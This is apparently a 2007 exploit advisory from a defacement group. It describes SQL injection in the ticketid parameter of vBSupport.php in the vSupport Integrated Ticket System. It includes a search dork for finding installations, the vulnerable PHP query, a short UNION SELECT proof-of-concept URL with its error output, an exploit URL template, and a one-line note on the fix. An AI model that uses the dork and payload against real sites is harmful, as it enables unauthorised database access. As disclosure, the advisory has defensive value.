+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Vendor ............: http://www.cmgsccc.com
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
// do not limit the users access
$fromuseraccess = "";
}
// get the info about the ticket first
if ($ticket = $db->query_first(" SELECT ticket.* " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . " FROM " . TABLE_PREFIX . "ticket as ticket " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . " WHERE ticketid=" . $vbulletin->GPC['ticketid'] . 
" $fromuseraccess ")) {
The ticketid request value is concatenated into the WHERE clause above without an integer cast or quoting; casting it to an integer before it reaches the query is the fix.
+--------------------------------------------------------------------
+ An example:
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
+--------------------------------------------------------------------
+ output:
+--------------------------------------------------------------------
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5
Error Number : 1064
Date : Monday, July 2nd 2007 @ 02:54:54 PM
Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer :
IP Address : 127.0.0.1
Username : admin
Classname : vb_database
Invalid SQL: SELECT ticket.* ,icon.title AS icontitle, icon.iconpath FROM ticket as ticket LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid) WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+ Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]
+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------